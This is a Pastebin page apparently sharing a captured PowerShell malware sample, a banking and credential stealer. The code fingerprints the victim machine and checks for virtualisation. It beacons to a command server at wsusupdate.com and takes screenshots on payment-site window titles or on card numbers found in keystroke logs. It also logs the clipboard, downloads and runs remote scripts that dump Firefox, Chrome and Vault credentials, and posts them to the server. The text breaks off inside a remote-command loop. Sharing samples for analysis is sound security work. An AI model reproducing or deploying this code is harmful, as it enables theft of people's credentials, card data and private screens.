Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #sample found by @JohnLaTwc
- #$WebPostTimer = 1200
- #$WebGetTimer = 1200
- [void] [Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
- [void] [Reflection.Assembly]::LoadWithPartialName("System.Drawing")
- function New-Mutex($MutexName) {
- #[CmdletBinding()][OutputType([PSObject])]
- #Param ([Parameter(Mandatory)][ValidateNotNullOrEmpty()][string]$MutexName)
- $MutexWasCreated = $false
- $Mutex = $Null
- Write-Verbose "Waiting to acquire lock [$MutexName]..."
- [void][System.Reflection.Assembly]::LoadWithPartialName('System.Threading')
- try {
- $Mutex = [System.Threading.Mutex]::OpenExisting($MutexName)
- } catch {
- $Mutex = New-Object System.Threading.Mutex($true, $MutexName, [ref]$MutexWasCreated)
- }
- try { if (!$MutexWasCreated) { $Mutex.WaitOne() | Out-Null } } catch { }
- Write-Verbose "Lock [$MutexName] acquired. Executing..."
- Write-Output ([PSCustomObject]@{ Name = $MutexName; Mutex = $Mutex })
- } # New-Mutex
- function Remove-Mutex {
- <#
- .SYNOPSIS
- Removes a previously created Mutex
- .DESCRIPTION
- This function attempts to release a lock on a mutex created by an earlier call
- to New-Mutex.
- .PARAMETER MutexObject
- The PSObject object as output by the New-Mutex function.
- .INPUTS
- None. You cannot pipe objects to this function.
- .OUTPUTS
- None.
- #Requires -Version 2.0
- #>
- #[CmdletBinding()]
- #Param ([Parameter(Mandatory)][ValidateNotNull()][PSObject]$MutexObject)
- # $MutexObject | fl * | Out-String | Write-Host
- Write-Verbose "Releasing lock [$($MutexObject.Name)]..."
- try { [void]$MutexObject.Mutex.ReleaseMutex() } catch { }
- } # Remove-Mutex
- new-mutex("Global\$env:username$((Get-Process -PID $pid).SessionID)")
- Function Get-StringHash([String] $String,$HashName = "MD5")
- {
- $StringBuilder = New-Object System.Text.StringBuilder
- [System.Security.Cryptography.HashAlgorithm]::Create($HashName).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($String))|%{
- [Void]$StringBuilder.Append($_.ToString("x2"))
- }
- $StringBuilder.ToString()
- }
- Function IsVirtual
- {
- $wmibios = Get-WmiObject Win32_BIOS -ErrorAction Stop | Select-Object version,serialnumber
- $wmisystem = Get-WmiObject Win32_ComputerSystem -ErrorAction Stop | Select-Object model,manufacturer
- $ResultProps = @{
- ComputerName = $computer
- BIOSVersion = $wmibios.Version
- SerialNumber = $wmibios.serialnumber
- Manufacturer = $wmisystem.manufacturer
- Model = $wmisystem.model
- IsVirtual = $false
- VirtualType = $null
- }
- if ($wmibios.SerialNumber -like "*VMware*") {
- $ResultProps.IsVirtual = $true
- $ResultProps.VirtualType = "Virtual - VMWare"
- }
- else {
- switch -wildcard ($wmibios.Version) {
- 'VIRTUAL' {
- $ResultProps.IsVirtual = $true
- $ResultProps.VirtualType = "Virtual - Hyper-V"
- }
- 'A M I' {
- $ResultProps.IsVirtual = $true
- $ResultProps.VirtualType = "Virtual - Virtual PC"
- }
- '*Xen*' {
- $ResultProps.IsVirtual = $true
- $ResultProps.VirtualType = "Virtual - Xen"
- }
- }
- }
- if (-not $ResultProps.IsVirtual) {
- if ($wmisystem.manufacturer -like "*Microsoft*")
- {
- $ResultProps.IsVirtual = $true
- $ResultProps.VirtualType = "Virtual - Hyper-V"
- }
- elseif ($wmisystem.manufacturer -like "*VMWare*")
- {
- $ResultProps.IsVirtual = $true
- $ResultProps.VirtualType = "Virtual - VMWare"
- }
- elseif ($wmisystem.model -like "*Virtual*") {
- $ResultProps.IsVirtual = $true
- $ResultProps.VirtualType = "Unknown Virtual Machine"
- }
- }
- $results += New-Object PsObject -Property $ResultProps
- return $ResultProps.IsVirtual
- }
- function Escape-JSONString($str){
- if ($str -eq $null) {return ""}
- $str = $str.ToString().Replace('"','\"').Replace('\','\\').Replace("`n",'\n').Replace("`r",'\r').Replace("`t",'\t')
- return $str;
- }
- function ConvertTo-JSON($maxDepth = 4,$forceArray = $false) {
- begin {
- $data = @()
- }
- process{
- $data += $_
- }
- end{
- if ($data.length -eq 1 -and $forceArray -eq $false) {
- $value = $data[0]
- } else {
- $value = $data
- }
- if ($value -eq $null) {
- return "null"
- }
- $dataType = $value.GetType().Name
- switch -regex ($dataType) {
- 'String' {
- return "`"{0}`"" -f (Escape-JSONString $value )
- }
- '(System\.)?DateTime' {return "`"{0:yyyy-MM-dd}T{0:HH:mm:ss}`"" -f $value}
- 'Int32|Double' {return "$value"}
- 'Boolean' {return "$value".ToLower()}
- '(System\.)?Object\[\]' { # array
- if ($maxDepth -le 0){return "`"$value`""}
- $jsonResult = ''
- foreach($elem in $value){
- #if ($elem -eq $null) {continue}
- if ($jsonResult.Length -gt 0) {$jsonResult +=', '}
- $jsonResult += ($elem | ConvertTo-JSON -maxDepth ($maxDepth -1))
- }
- return "[" + $jsonResult + "]"
- }
- '(System\.)?Hashtable' { # hashtable
- $jsonResult = ''
- foreach($key in $value.Keys){
- if ($jsonResult.Length -gt 0) {$jsonResult +=', '}
- $jsonResult +=
- @"
- "{0}": {1}
- "@ -f $key , ($value[$key] | ConvertTo-JSON -maxDepth ($maxDepth -1) )
- }
- return "{" + $jsonResult + "}"
- }
- default { #object
- if ($maxDepth -le 0){return "`"{0}`"" -f (Escape-JSONString $value)}
- return "{" +
- (($value | Get-Member -MemberType *property | % {
- @"
- "{0}": {1}
- "@ -f $_.Name , ($value.($_.Name) | ConvertTo-JSON -maxDepth ($maxDepth -1) )
- }) -join ', ') + "}"
- }
- }
- }
- }
- function Get-SystemUptime ($computer = "$env:computername") {
- $lastboot = [System.Management.ManagementDateTimeconverter]::ToDateTime("$((gwmi Win32_OperatingSystem).LastBootUpTime)")
- $uptime = (Get-Date) - $lastboot
- #Write-Host "System Uptime for $computer is: " $uptime.days "days" $uptime.hours "hours" $uptime.minutes "minutes" $uptime.seconds "seconds"
- return (($uptime.days).ToString()+"d:"+($uptime.hours).ToString()+"h:"+$uptime.minutes.ToString()+"m:"+($uptime.seconds).ToString()+"s")
- }
- $Screens = [system.windows.forms.screen]::AllScreens
- foreach ($Screen in $Screens) {
- $DeviceName = $Screen.DeviceName
- $Width = $Screen.Bounds.Width
- $Height = $Screen.Bounds.Height
- $IsPrimary = $Screen.Primary
- }
- $ScreenshotPath = "$env:temp\39F28DD9-0677-4EAC-91B8-2112B1515341"
- if (-not (Test-Path $ScreenshotPath))
- {
- New-Item $ScreenshotPath -ItemType Directory -Force
- }
- $resolution = $Width.ToString()+"x"+$Height.ToString()
- $username = "$env:username".ToLower()
- $url = "https://wsusupdate.com"
- $hashid = Get-StringHash($(Get-WMIObject -class Win32_DiskDrive | Where-Object {$_.DeviceID -eq "\\.\PHYSICALDRIVE0"}).SerialNumber + `
- $(Get-WmiObject -class Win32_OperatingSystem).SerialNumber )
- $cpu_name = $(Get-WmiObject -class "Win32_Processor" -namespace "root/CIMV2")[0].name
- if ($cpu_name -eq $null) { $cpu_name = $(Get-WmiObject -class "Win32_Processor" -namespace "root/CIMV2").name }
- $vm = IsVirtual
- $ram = ([Math]::Round((Get-WmiObject -Class win32_computersystem).TotalPhysicalMemory/1Gb)).toString()
- $os = (Get-WmiObject -class Win32_OperatingSystem).Caption
- $os_arch = (Get-WmiObject -class Win32_OperatingSystem).OSArchitecture
- $uptime = Get-SystemUptime
- #$ext_ip = (New-Object net.webclient).downloadstring("http://checkip.dyndns.com") -replace "[^\d\.]"
- $ext_ip = ''
- $timezone = [TimeZoneInfo]::Local.BaseUtcOffset.Hours
- $IsAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
- if ((Get-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server').fDenyTSConnections -eq 1) { $rdp = $False }
- else { $rdp = $True }
- if($IsAdmin -ne $True){
- if( ($(whoami /groups) -like "*S-1-5-32-544*").length -eq 1 ) { $IsAdmin = $True }
- }
- #$wan_speed = New-Object net.webclient; "{0:N2} Mbit/sec" -f ((100/(Measure-Command {$wc.Downloadfile('http://east.testmy.net/dl-100MB',"c:\speedtest.test")}).TotalSeconds)*8); del c:\speedtest.test
- if ((gwmi win32_computersystem).partofdomain -eq $true -and (gwmi win32_computersystem).domain -ne "WORKGROUP") {
- $domain = (gwmi win32_computersystem).domain.ToUpper()
- }
- else {$domain = 'nodomain'}
- $log_file = "$env:temp\key.log"
- $version = "04a"
- $params = @{"resolution" = "$resolution"; "timezone" = "$timezone"; "uptime" = "$uptime"; "computer_name" = $env:computername.ToUpper(); "isadmin" = $isadmin; "username" = "$username"; "domain" = "$domain"; "cpu_name" = "$cpu_name"; "vm" = $vm; "ram" = "$ram"; `
- "hashid" = "$hashid"; "url" = "$url"; "log_file" = "$log_file"; "Screenshot_path" = "$ScreenshotPath"; "version" = "$version"; "os" = "$os"; "os_arch" = "$os_arch"; "rdp" = "$rdp"; "ext_ip" = "$ext_ip"}
- $m = $params | ConvertTo-json
- $m
- function Invoke-Start
- {
- $buffer = [System.Text.Encoding]::UTF8.GetBytes($m)
- try {
- [System.Net.HttpWebRequest] $webRequest = [System.Net.WebRequest]::Create($params.url+"/start")
- #[System.Net.HttpWebRequest] $webRequest = [System.Net.WebRequest]::Create("https://dweffweew.com/start")
- [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
- $webRequest.ContentType = "application/json"
- $webRequest.Timeout = 10000
- $webRequest.Method = "POST"
- $webRequest.ContentLength = $buffer.Length;
- $requestStream = $webRequest.GetRequestStream()
- $requestStream.Write($buffer, 0, $buffer.Length)
- $requestStream.Flush()
- $requestStream.Close()
- [System.Net.HttpWebResponse] $webResponse = $webRequest.GetResponse()
- $streamReader = New-Object System.IO.StreamReader($webResponse.GetResponseStream())
- $result = $streamReader.ReadToEnd()
- return $result
- }
- catch {
- return $_.Exception.Message
- }
- }
- While ($True) {
- $response = Invoke-Start
- if ($response -eq 'null') {
- break
- }
- $response
- Start-Sleep -s 1200
- continue
- }
- function Title-Monitor
- {
- Start-Job -ScriptBlock {
- Add-Type @"
- using System;
- using System.Runtime.InteropServices;
- public class UserWindows {
- [DllImport("user32.dll")]
- public static extern IntPtr GetForegroundWindow();
- }
- "@
- $hashid = $args[0]
- $url = $args[1]
- $username = $args[2]
- $resolution = $args[3]
- $ScreenshotPath = $args[4]
- function Get-ScreenShot
- {
- $OutPath = "$env:temp\39F28DD9-0677-4EAC-91B8-2112B1515341"
- Add-Type -AssemblyName System.Windows.Forms
- $fileName = '{0}.jpg' -f (Get-Date).ToString('yyyyMMdd_HHmmss')
- $path = Join-Path $ScreenshotPath $fileName
- $b = New-Object System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width, [System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height)
- $g = [System.Drawing.Graphics]::FromImage($b)
- $g.CopyFromScreen((New-Object System.Drawing.Point(0,0)), (New-Object System.Drawing.Point(0,0)), $b.Size)
- $g.Dispose()
- $myEncoder = [System.Drawing.Imaging.Encoder]::Quality
- $encoderParams = New-Object System.Drawing.Imaging.EncoderParameters(1)
- $encoderParams.Param[0] = New-Object System.Drawing.Imaging.EncoderParameter($myEncoder, 20)
- $myImageCodecInfo = [System.Drawing.Imaging.ImageCodecInfo]::GetImageEncoders()|where {$_.MimeType -eq 'image/jpeg'}
- $b.Save($path,$myImageCodecInfo, $($encoderParams))
- }
- Get-ScreenShot
- #filter Luhn($x){$l=$x.Length-1;$l..0|%{$d=$x[$_]-48;if($_%2-eq$l%2){$s+=$d}elseif($d-le4){$s+=$d*2}else{$s+=$d*2-9}};!($s%10)}
- function Luhn([int[]]$digits){
- [int]$sum=0
- [bool]$alt=$false
- for($i = $digits.length - 1; $i -ge 0; $i--){
- if($alt){
- $digits[$i] *= 2
- if($digits[$i] -gt 9) { $digits[$i] -= 9 }
- }
- $sum += $digits[$i]
- $alt = !$alt
- }
- return ($sum % 10) -eq 0
- }
- $luhn_matches_previous = 0
- while ($True) {
- $Process = Get-Process | ? {$_.MainWindowHandle -eq ([UserWindows]::GetForegroundWindow())}
- if (Test-Path "$env:TEMP\key.log") {
- $keystring = ''
- (Get-Content $env:temp\key.log) | foreach { $keystring += $_.split(",")[0].replace('"', '') }
- $luhn_matches = @()
- Select-String -Pattern "[456][0-9]{15}|3[0-9]{14}" -InputObject $keystring -AllMatches | foreach {$_.matches} | Select-String -NotMatch "(\d)\1{5,}" | foreach { if (luhn([int[]][string[]][char[]]$_.value) -eq $true) {$luhn_matches += $True}}
- if ($luhn_matches.length -lt $luhn_matches_previous) { $luhn_matches_previous = 0 }
- if (($luhn_matches -contains $True) -and ($luhn_matches.length -gt $luhn_matches_previous)) {
- 1..20 | % {
- Get-ScreenShot
- Start-Sleep -Seconds 5
- }
- $luhn_matches_previous = $luhn_matches.length
- }
- }
- if (Test-Path $env:temp\keywords.txt) {
- $keywords = ((Get-Content $env:temp\keywords.txt).split(' '))[1].split('|')
- foreach ($keyword in $keywords) {if (($Process.MainWindowTitle -clike "*$keyword*" ) -and (Test-Path "$env:TEMP\key.log")) {
- 1..20 | % {
- Get-ScreenShot
- Start-Sleep -Seconds 5
- }
- }
- }
- }
- if (($Process.MainWindowTitle -like '*checkout*') -or ($Process.MainWindowTitle -like '*Pay-Me-Now*') `
- -or ($Process.MainWindowTitle -like '*Sign On - Citibank*') -or ($Process.MainWindowTitle -like 'Sign in or Register | eBay')`
- -or ($Process.MainWindowTitle -like '*Credit Card*') -or ($Process.MainWindowTitle -like '*Place Your Order*') `
- -or ($Process.MainWindowTitle -clike '*Banking*') -or ($Process.MainWindowTitle -like '*Log in to your PayPal account*') `
- -or ($Process.MainWindowTitle -like '*Expedia Partner*Central*') -or ($Process.MainWindowTitle -like '*Booking.com Extranet*') `
- -or ($Process.MainWindowTitle -like '*Chase Online - Logon*') -or ($Process.MainWindowTitle -like '*One Time Pay*') `
- -or ($Process.MainWindowTitle -clike '*LogMeIn*') -or ($Process.MainWindowTitle -clike '*Windows Security*') `
- -or ($Process.MainWindowTitle -like '*Choose a way to pay*') -or ($Process.MainWindowTitle -like '*payment information*') `
- -or ($Process.MainWindowTitle -clike '*Change Reservation*') -or ($Process.MainWindowTitle -clike '*POS*') `
- -or ($Process.MainWindowTitle -like '*Virtual*Terminal*') -or ($Process.MainWindowTitle -like '*PayPal: Wallet*') `
- -or ($Process.MainWindowTitle -like '*iatspayment*') -or ($Process.MainWindowTitle -like '*LogMeIn*') `
- -or ($Process.MainWindowTitle -clike '*Authorize.Net*') -or ($Process.MainWindowTitle -like '*LogMeIn*') `
- -or ($Process.MainWindowTitle -clike '*Discover Card*') -or ($Process.MainWindowTitle -like '*LogMeIn*') `
- -or ($Process.MainWindowTitle -like '*ewallet*') -or ($Process.MainWindowTitle -like '*arcot*') `
- -or ($Process.MainWindowTitle -clike '*PayTrace*') -or ($Process.MainWindowTitle -clike '*New Charge*') `
- -or ($Process.MainWindowTitle -clike '*Verification*') -or ($Process.MainWindowTitle -clike '*PIN*') `
- -or ($Process.MainWindowTitle -clike '*Authentication*') -or ($Process.MainWindowTitle -clike '*Password*') `
- -or ($Process.MainWindowTitle -clike '*Debit Card*') -or ($Process.MainWindowTitle -clike '*Activation*') `
- -or ($Process.MainWindowTitle -clike '*LastPass*') -or ($Process.MainWindowTitle -clike '*SSN*') `
- -or ($Process.MainWindowTitle -clike '*Driver*License*') -or ($Process.MainWindowTitle -clike '*Check-in for*') `
- -or ($Process.MainWindowTitle -clike '*Umpqua*') -or ($Process.MainWindowTitle -clike '*ePayment*') `
- -or ($Process.MainWindowTitle -clike '*Converge -*') -or ($Process.MainWindowTitle -clike '*Swipe*') `
- -or ($Process.MainWindowTitle -like '*Payrazr*') -or ($Process.MainWindowTitle -clike '*Hosted -*') `
- -and (Test-Path "$env:TEMP\key.log")) {
- 1..20 | % {
- Get-ScreenShot
- Start-Sleep -Seconds 5
- }
- }
- Start-Sleep -Seconds 5
- }
- } -ArgumentList $params.hashid, $params.url, $params.username, $params.resolution, $params.Screenshot_Path
- }
- function Gclip {
- Start-Job -ScriptBlock {
- $PollInterval = 3
- Add-Type -AssemblyName System.Windows.Forms
- # used to check if the contents have changed
- $PrevLength = 0
- $PrevFirstChar = ""
- for(;;){
- # stolen/adapted from http://brianreiter.org/2010/09/03/copy-and-paste-with-clipboard-from-powershell/
- $tb = New-Object System.Windows.Forms.TextBox
- $tb.Multiline = $true
- $tb.Paste()
- # only output clipboard data if it's changed
- if (($tb.Text.Length -ne 0) -and ($tb.Text.Length -ne $PrevLength)){
- # if the length isn't 0, the length has changed, and the first character
- # has changed, assume the clipboard has changed
- # YES I know there might be edge cases :)
- if($PrevFirstChar -ne ($tb.Text)[0]){
- $TimeStamp = (Get-Date -Format dd/MM/yyyy:HH:mm:ss:ff)
- #Out-File -FilePath "$env:Temp\Applnsights_VisualStudio.txt" -Append -InputObject "`========== CLIPBOARD ==========`n" -Encoding unicode
- Out-File -FilePath "$env:Temp\Applnsights_VisualStudio.txt" -Append -InputObject $tb.Text -Encoding unicode
- $PrevFirstChar = ($tb.Text)[0]
- $PrevLength = $tb.Text.Length
- }
- }
- Start-Sleep -s $PollInterval
- }
- }
- }
- function GetFF {
- Start-Job -ScriptBlock {
- function Escape-JSONString($str){
- if ($str -eq $null) {return ""}
- $str = $str.ToString().Replace('"','\"').Replace('\','\\').Replace("`n",'\n').Replace("`r",'\r').Replace("`t",'\t')
- return $str;
- }
- function ConvertTo-JSON($maxDepth = 4,$forceArray = $false) {
- begin {
- $data = @()
- }
- process{
- $data += $_
- }
- end{
- if ($data.length -eq 1 -and $forceArray -eq $false) {
- $value = $data[0]
- } else {
- $value = $data
- }
- if ($value -eq $null) {
- return "null"
- }
- $dataType = $value.GetType().Name
- switch -regex ($dataType) {
- 'String' {
- return "`"{0}`"" -f (Escape-JSONString $value )
- }
- '(System\.)?DateTime' {return "`"{0:yyyy-MM-dd}T{0:HH:mm:ss}`"" -f $value}
- 'Int32|Double' {return "$value"}
- 'Boolean' {return "$value".ToLower()}
- '(System\.)?Object\[\]' { # array
- if ($maxDepth -le 0){return "`"$value`""}
- $jsonResult = ''
- foreach($elem in $value){
- #if ($elem -eq $null) {continue}
- if ($jsonResult.Length -gt 0) {$jsonResult +=', '}
- $jsonResult += ($elem | ConvertTo-JSON -maxDepth ($maxDepth -1))
- }
- return "[" + $jsonResult + "]"
- }
- '(System\.)?Hashtable' { # hashtable
- $jsonResult = ''
- foreach($key in $value.Keys){
- if ($jsonResult.Length -gt 0) {$jsonResult +=', '}
- $jsonResult +=
- @"
- "{0}": {1}
- "@ -f $key , ($value[$key] | ConvertTo-JSON -maxDepth ($maxDepth -1) )
- }
- return "{" + $jsonResult + "}"
- }
- default { #object
- if ($maxDepth -le 0){return "`"{0}`"" -f (Escape-JSONString $value)}
- return "{" +
- (($value | Get-Member -MemberType *property | % {
- @"
- "{0}": {1}
- "@ -f $_.Name , ($value.($_.Name) | ConvertTo-JSON -maxDepth ($maxDepth -1) )
- }) -join ', ') + "}"
- }
- }
- }
- }
- $url = $args[0]
- $resolution = $args[1]
- $domain = $args[2]
- $computer_name = $args[3]
- $username = $args[4]
- $timezone = $args[5]
- $hashid = $args[6]
- $version = $args[7]
- [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
- & cmd /c %systemroot%\syswow64\windowspowershell\v1.0\powershell.exe "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { `$true }; IEX (New-Object Net.WebClient).DownloadString('https://wsusupdate.com/script?id=random&name=firefox'); Get-FoxDump -OutFile $env:temp\firefox.log; Exit"
- & cmd /c %systemroot%\system32\windowspowershell\v1.0\powershell.exe "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { `$true }; IEX (New-Object Net.WebClient).DownloadString('https://wsusupdate.com/script?id=random&name=firefox'); Get-FoxDump -OutFile $env:temp\firefox.log; Exit"
- If (Test-Path "$env:temp\firefox.log") {
- $content = Get-Content $env:temp\firefox.log | Out-String
- $content = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($content))
- $json = @{"resolution" = $resolution; "domain" = $domain; "computer_name" = $computer_name; "username" = $username; "timezone" = $timezone; "hashid" = $hashid; "version" = $version; "content" = $content; "type" = "ffbrwpwd"}
- $log_json = $json | ConvertTo-Json
- $buffer = [System.Text.Encoding]::UTF8.GetBytes($log_json)
- [System.Net.HttpWebRequest] $webRequest = [System.Net.WebRequest]::Create($url+"/pshlog")
- $webRequest.ContentType = "application/json"
- $webRequest.Timeout = 10000
- $webRequest.Method = "POST"
- $webRequest.ContentLength = $buffer.Length;
- $requestStream = $webRequest.GetRequestStream()
- $requestStream.Write($buffer, 0, $buffer.Length)
- $requestStream.Flush()
- $requestStream.Close()
- [System.Net.HttpWebResponse] $webResponse = $webRequest.GetResponse()
- $streamReader = New-Object System.IO.StreamReader($webResponse.GetResponseStream())
- $result = $streamReader.ReadToEnd()
- Remove-Item "$env:temp\firefox.log"
- }
- } -ArgumentList $params.url, $params.resolution, $params.domain, $params.computer_name, $params.username, $params.timezone, $params.hashid, $params.version
- }
- function GetChrome {
- Start-Job -ScriptBlock {
- function Escape-JSONString($str){
- if ($str -eq $null) {return ""}
- $str = $str.ToString().Replace('"','\"').Replace('\','\\').Replace("`n",'\n').Replace("`r",'\r').Replace("`t",'\t')
- return $str;
- }
- function ConvertTo-JSON($maxDepth = 4,$forceArray = $false) {
- begin {
- $data = @()
- }
- process{
- $data += $_
- }
- end{
- if ($data.length -eq 1 -and $forceArray -eq $false) {
- $value = $data[0]
- } else {
- $value = $data
- }
- if ($value -eq $null) {
- return "null"
- }
- $dataType = $value.GetType().Name
- switch -regex ($dataType) {
- 'String' {
- return "`"{0}`"" -f (Escape-JSONString $value )
- }
- '(System\.)?DateTime' {return "`"{0:yyyy-MM-dd}T{0:HH:mm:ss}`"" -f $value}
- 'Int32|Double' {return "$value"}
- 'Boolean' {return "$value".ToLower()}
- '(System\.)?Object\[\]' { # array
- if ($maxDepth -le 0){return "`"$value`""}
- $jsonResult = ''
- foreach($elem in $value){
- #if ($elem -eq $null) {continue}
- if ($jsonResult.Length -gt 0) {$jsonResult +=', '}
- $jsonResult += ($elem | ConvertTo-JSON -maxDepth ($maxDepth -1))
- }
- return "[" + $jsonResult + "]"
- }
- '(System\.)?Hashtable' { # hashtable
- $jsonResult = ''
- foreach($key in $value.Keys){
- if ($jsonResult.Length -gt 0) {$jsonResult +=', '}
- $jsonResult +=
- @"
- "{0}": {1}
- "@ -f $key , ($value[$key] | ConvertTo-JSON -maxDepth ($maxDepth -1) )
- }
- return "{" + $jsonResult + "}"
- }
- default { #object
- if ($maxDepth -le 0){return "`"{0}`"" -f (Escape-JSONString $value)}
- return "{" +
- (($value | Get-Member -MemberType *property | % {
- @"
- "{0}": {1}
- "@ -f $_.Name , ($value.($_.Name) | ConvertTo-JSON -maxDepth ($maxDepth -1) )
- }) -join ', ') + "}"
- }
- }
- }
- }
- $url = $args[0]
- $resolution = $args[1]
- $domain = $args[2]
- $computer_name = $args[3]
- $username = $args[4]
- $timezone = $args[5]
- $hashid = $args[6]
- $version = $args[7]
- [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
- & cmd /c %systemroot%\system32\windowspowershell\v1.0\powershell.exe "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { `$true }; IEX (New-Object Net.WebClient).DownloadString('https://wsusupdate.com/script?id=random&name=chrome'); Stop-Process -name chrome -ErrorAction SilentlyContinue; Start-sleep -seconds 3; Get-ChromeDump -OutFile $env:temp\chrome.log; Exit"
- Start-Sleep -Seconds 60
- If (Test-Path "$env:temp\chrome.log") {
- #$content = [IO.File]::ReadAllText("$env:temp\chrome.log")
- $content = Get-Content "$env:temp\chrome.log" | Out-String
- $content = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($content))
- $json = @{"resolution" = $resolution; "domain" = $domain; "computer_name" = $computer_name; "username" = $username; "timezone" = $timezone; "hashid" = $hashid; "version" = $version; "content" = $content; "type" = "chbrwpwd"}
- $log_json = $json | ConvertTo-Json
- $buffer = [System.Text.Encoding]::UTF8.GetBytes($log_json)
- write-host $buffer
- $url+'/pshlog'
- [System.Net.HttpWebRequest] $webRequest = [System.Net.WebRequest]::Create($url+'/pshlog')
- $webRequest.ContentType = "application/json"
- $webRequest.Timeout = 10000
- $webRequest.Method = "POST"
- $webRequest.ContentLength = $buffer.Length;
- $requestStream = $webRequest.GetRequestStream()
- $requestStream.Write($buffer, 0, $buffer.Length)
- $requestStream.Flush()
- $requestStream.Close()
- [System.Net.HttpWebResponse] $webResponse = $webRequest.GetResponse()
- $streamReader = New-Object System.IO.StreamReader($webResponse.GetResponseStream())
- $result = $streamReader.ReadToEnd()
- }
- } -ArgumentList $params.url, $params.resolution, $params.domain, $params.computer_name, $params.username, $params.timezone, $params.hashid, $params.version
- }
- function GetVault {
- Start-Job -ScriptBlock {
- function Escape-JSONString($str){
- if ($str -eq $null) {return ""}
- $str = $str.ToString().Replace('"','\"').Replace('\','\\').Replace("`n",'\n').Replace("`r",'\r').Replace("`t",'\t')
- return $str;
- }
- function ConvertTo-JSON($maxDepth = 4,$forceArray = $false) {
- begin {
- $data = @()
- }
- process{
- $data += $_
- }
- end{
- if ($data.length -eq 1 -and $forceArray -eq $false) {
- $value = $data[0]
- } else {
- $value = $data
- }
- if ($value -eq $null) {
- return "null"
- }
- $dataType = $value.GetType().Name
- switch -regex ($dataType) {
- 'String' {
- return "`"{0}`"" -f (Escape-JSONString $value )
- }
- '(System\.)?DateTime' {return "`"{0:yyyy-MM-dd}T{0:HH:mm:ss}`"" -f $value}
- 'Int32|Double' {return "$value"}
- 'Boolean' {return "$value".ToLower()}
- '(System\.)?Object\[\]' { # array
- if ($maxDepth -le 0){return "`"$value`""}
- $jsonResult = ''
- foreach($elem in $value){
- #if ($elem -eq $null) {continue}
- if ($jsonResult.Length -gt 0) {$jsonResult +=', '}
- $jsonResult += ($elem | ConvertTo-JSON -maxDepth ($maxDepth -1))
- }
- return "[" + $jsonResult + "]"
- }
- '(System\.)?Hashtable' { # hashtable
- $jsonResult = ''
- foreach($key in $value.Keys){
- if ($jsonResult.Length -gt 0) {$jsonResult +=', '}
- $jsonResult +=
- @"
- "{0}": {1}
- "@ -f $key , ($value[$key] | ConvertTo-JSON -maxDepth ($maxDepth -1) )
- }
- return "{" + $jsonResult + "}"
- }
- default { #object
- if ($maxDepth -le 0){return "`"{0}`"" -f (Escape-JSONString $value)}
- return "{" +
- (($value | Get-Member -MemberType *property | % {
- @"
- "{0}": {1}
- "@ -f $_.Name , ($value.($_.Name) | ConvertTo-JSON -maxDepth ($maxDepth -1) )
- }) -join ', ') + "}"
- }
- }
- }
- }
- $url = $args[0]
- $resolution = $args[1]
- $domain = $args[2]
- $computer_name = $args[3]
- $username = $args[4]
- $timezone = $args[5]
- $hashid = $args[6]
- $version = $args[7]
- $vault_url = $url+'/script?id=random&name=vault'
- Write-host $vault_url
- [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
- IEX (New-Object Net.WebClient).DownloadString($vault_url); Get-VaultCredential -OutVariable vaultcreds -ErrorAction SilentlyContinue
- #Write-host 'ERROR'
- #$vaultcredserror
- $vaultcreds = $vaultcreds | Out-String
- $content = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($vaultcreds))
- if ($content.length -ne 0) {
- $json = @{"resolution" = $resolution; "domain" = $domain; "computer_name" = $computer_name; "username" = $username; "timezone" = $timezone; "hashid" = $hashid; "version" = $version; "content" = $content; "type" = "vault"}
- $json
- $log_json = $json | ConvertTo-Json
- $buffer = [System.Text.Encoding]::UTF8.GetBytes($log_json)
- write-host $buffer
- [System.Net.HttpWebRequest] $webRequest = [System.Net.WebRequest]::Create($url+'/pshlog')
- $webRequest.ContentType = "application/json"
- $webRequest.Timeout = 10000
- $webRequest.Method = "POST"
- $webRequest.ContentLength = $buffer.Length;
- $requestStream = $webRequest.GetRequestStream()
- $requestStream.Write($buffer, 0, $buffer.Length)
- $requestStream.Flush()
- $requestStream.Close()
- [System.Net.HttpWebResponse] $webResponse = $webRequest.GetResponse()
- $streamReader = New-Object System.IO.StreamReader($webResponse.GetResponseStream())
- $result = $streamReader.ReadToEnd()
- }
- } -ArgumentList $params.url, $params.resolution, $params.domain, $params.computer_name, $params.username, $params.timezone, $params.hashid, $params.version
- }
- function WebGet {
- Start-Job -ScriptBlock {
- $url = $args[0]
- $resolution = $args[1]
- $domain = $args[2]
- $computer_name = $args[3]
- $username = $args[4]
- $timezone = $args[5]
- $hashid = $args[6]
- $version = $args[7]
- while ($true) {
- $WebClient=New-Object net.webclient
- [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
- $String=$WebClient.DownloadString($url+"/command?domain=$domain&username=$username&hashid=$hashid&computer_name=$computer_name&ver=$version")
- if ($String -ne '0') {
- foreach ($cmd in ($string -split '["\n\r"|"\r\n"|\n|\r]')) {
- if ($cmd.StartsWith("+screenshot",1)) { $cmd | Out-File $env:temp\keywords.txt }
- elseif ($cmd.StartsWith("-screenshot",1)) { Remove-Item $env:temp\keywords.txt }
- elseif ($cmd.StartsWith("+vnc", 1)) {
- if([IntPtr]::Size -eq 8) {
- & cmd /c %systemroot%\syswow64\windowspowershell\v1.0\powershell.exe "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { `$true }; IEX (New-Object Net.WebClient).DownloadString('$url/script?id=1&name=vnc');"
- }
